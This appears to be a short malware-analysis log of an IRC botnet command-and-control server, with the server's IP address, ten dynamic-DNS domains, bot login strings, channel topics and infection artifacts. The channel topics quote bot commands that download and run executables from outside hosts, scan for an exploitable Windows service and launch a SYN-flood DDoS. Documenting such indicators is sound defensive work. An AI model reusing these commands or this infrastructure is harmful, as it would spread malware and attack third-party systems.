60.165.98.198

Botnet C&C irc
addr: pantylost.mooo.com ip: 60.165.98.198
addr: marinehh.twilightparadox.com ip: 60.165.98.198
addr: stockingag.jumpingcrab.com ip: 60.165.98.198
addr: pantylost.crabdance.com ip: 60.165.98.198
addr: onthebreak.UglyAs.com ip: 60.165.98.198
addr: headmefc.AsSexyAs.com ip: 60.165.98.198
addr: computercc.ignorelist.com ip: 60.165.98.198
addr: sandtp.chickenkiller.com ip: 60.165.98.198
addr: greenbarc.IsTheBe.st ip: 60.165.98.198
addr: ringc.strangled.net ip: 60.165.98.198

60.165.98.198:8684
NICK [N00_USA_XP_39922187]
USER SP2-917 * 0 :COMPUTERNAME
Now talking in #blue3
* Topic is '|.ddosstop -s|.stop -s|.patcher http://58.240.104.57:9008/logo.gif 0 -s|.shttp ftp://ccc:1@60.10.179.100:6054/282.gif fewh.exe -s|.asc svrsvc_SP2 100 5 9999 1 -b -e -r -s|.asc svrsvc_SP2 50 5 9999 0 -b -r -s|.join #sd3 -s'
Set by ccc on Tue Dec 28 08:36:24

Now talking in #2k38
Topic is '|.ddosstop -s|.aksyn www.jjj.com 80 9999999 wyn 5000 100 5 0 0 0 0 10 5 0 0 -s'
Set by ccc on Wed Feb 09 17:18:13

Process Created:
C:\WINDOWS\system32\serivces.exe
Services Created:
PlugPlayCM SERVICE_AUTO_START "C:\WINDOWS\system32\serivces.exe"